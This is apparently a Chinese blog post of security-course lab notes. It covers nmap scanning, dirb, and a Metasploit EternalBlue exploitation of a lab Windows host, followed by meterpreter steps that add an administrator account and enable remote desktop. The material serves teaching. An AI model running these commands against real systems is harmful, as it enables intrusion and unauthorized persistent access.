笔记

信息安全 2020/10/20笔记

虚拟机架构:
寄居架构:作为应该用程序运行在操作系统之上
原生架构:作为操作系统直接安装在硬件之上

寄居架构:vmware workstation pro/ Oracle Virtualbox /Hyper-v/KVM/Docker
原生架构:vmware vsphere(ESXI/Center)/Windows server Hyper
Kali Linux默认的用户名和密码:kali:kali
攻击机IP地址:192.168.1.25
目标靶机IP地址:192.168.1.26
Nmap:网络扫描工具,“扫描之王”
windows产看IP地址的命令:ipconfig
linux产看IP地址的命令:ifconfig
nmap -sn ip段 #-sn参数使用ping的方式进行扫描
当前终端下开启另一个标签的快捷键:Ctrl+Shift+T
一个服务程序可以占用多个端口号
一个端口号可以提供1个服务程序
FTP:文件传输服务
20:用来传输文件
21:用来传输FTP指令
22:SSH 远程连接协议
sudo passwd root //使用passwd更改root用户密码
nmap:
network mapper
network:网络
mapper:地图
Nmap --help //长选项
Nmap -h //短选项
-sn
ping:检测网络的连通性
ping ipaddress(地址)

192.168.1.0 网络ID
192.168.0.1-192.168.255.254 C类IP地址的私有网段
11111111.11111111.11111111.00000000
nmap --all
nmap -A //扫描操作系统类型,端口号信息
directory 目录
discovery 发现
dirb directory buster 目录爆破
dirb url(统一资源定位符)
协议://IP地址或域名:端口号/路径名/指定资源
200:响应正常
403:响应错误
exploit:漏洞利用
rb–>ruby(脚本语言)
git:github本地管理工具
ls (list) 列表:查看当前目录下的文件及文件夹
cat:查看文件内容
相对路径:以当前路径开始
绝对路径:从根开始的路径
一切设备皆文件
根:/
.:当前目录
…:上级目录

信息安全 2020/10/21笔记

https://nmap.org/
nmap -v ipaddress //显示扫描过程的详细信息
nmap 192.168.1.1
nmap 192.168.51.1 192.168.51.6
nmap 192.168.1.1~192.168.1.10 //在Kali能够执行成功
nmap 192.168.1.0/24
nmap 192.168.1.0/24 -exclude 192.168.1.1
nmap -O 192.168.1.2 //扫描操作系统的类型
nmap 192.168.1.0/24 -excludefile D://exc.txt
21(FTP)
22(SSH)
23(Telnet)
80(HTTP)
443(HTTPS)
1433(SQL server)
nmap 192.168.1.26 -p 21,22,23, 80
nmap --traceroute IP //扫描目标主机网络延迟状况
nmap -sP 192.168.1.0/24 //同-sn参数
nmap -sV 192.168.1.0/24 //扫描端口的服务版本信息
Nmap的插件脚本是使用LUA
nmap -Pn 192.168.1.26 //-Pn 绕过防火墙检测
nmap --script=auth 192.168.1.26 //该命令会检测出 开放的端口,以及 免密登录的方式
nmap --script=brute 192.168.1.26 //可以对数据库、SMB、SNMP等进行简单的密码暴力猜解
nmap --script=vuln 192.168.1.26 //扫描目标端口服务漏洞
漏洞扫描工具:
Nmap
IBM Appscan
Nessus
openvas
AWVS
漏洞利用工具
Metasploit
命令行启动命令:msfconsole
msf–》metasploit
console 控制台
vulnerable :可利用的
msf5>search 关键字
msf5>use 模块 //调用模块
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets //显示可以攻击的目标系统
msf5 exploit(windows/smb/ms17_010_eternalblue) >set RHOSTS 目标靶机IP地址
msf5 exploit(windows/smb/ms17_010_eternalblue) >exploit //漏洞攻击
meterpreter>
getuid //获取当前shell的权限
shell //进入对方的CMD命令环境
Ctrl+c //中至当前的程序执行
sessions //常看当前获取的回话
sessions -i ID //选择指定ID进入会话
background //退出当前获取的会话
netstat -an | find “3389”
|(管道符):将一个命令的输出作为另一个命令的输入
net user 用户名 密码 /add //创建一个用户
net user 用户名 密码 /del //删除指定用户
net localgroup administrators 用户名 /add
meterpreter>run getgui -e //开启远程主机的远程桌面服务
rdesktop ipaddress //连接指定地址的远程桌面

信息安全 2020/10/22笔记

https://app.yinxiang.com/fx/c172593b-ef38-45dd-a389-371fe14efd83 实战入侵windows7主机
https://app.yinxiang.com/fx/29f0ff2c-a1ec-46f1-98f3-906118c1f745 实战入侵windows server 2003主机
https://app.yinxiang.com/fx/82d5d328-cc80-40c1-966a-3daef61eac5f 实战入侵windows server 2008主机
https://app.yinxiang.com/fx/80bbd446-a780-4498-90a3-a27f884e950d 永恒之蓝漏洞原理
https://app.yinxiang.com/fx/a7f905ea-0ac5-442e-97be-9f6e71bca76f 永恒之蓝漏洞修补

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值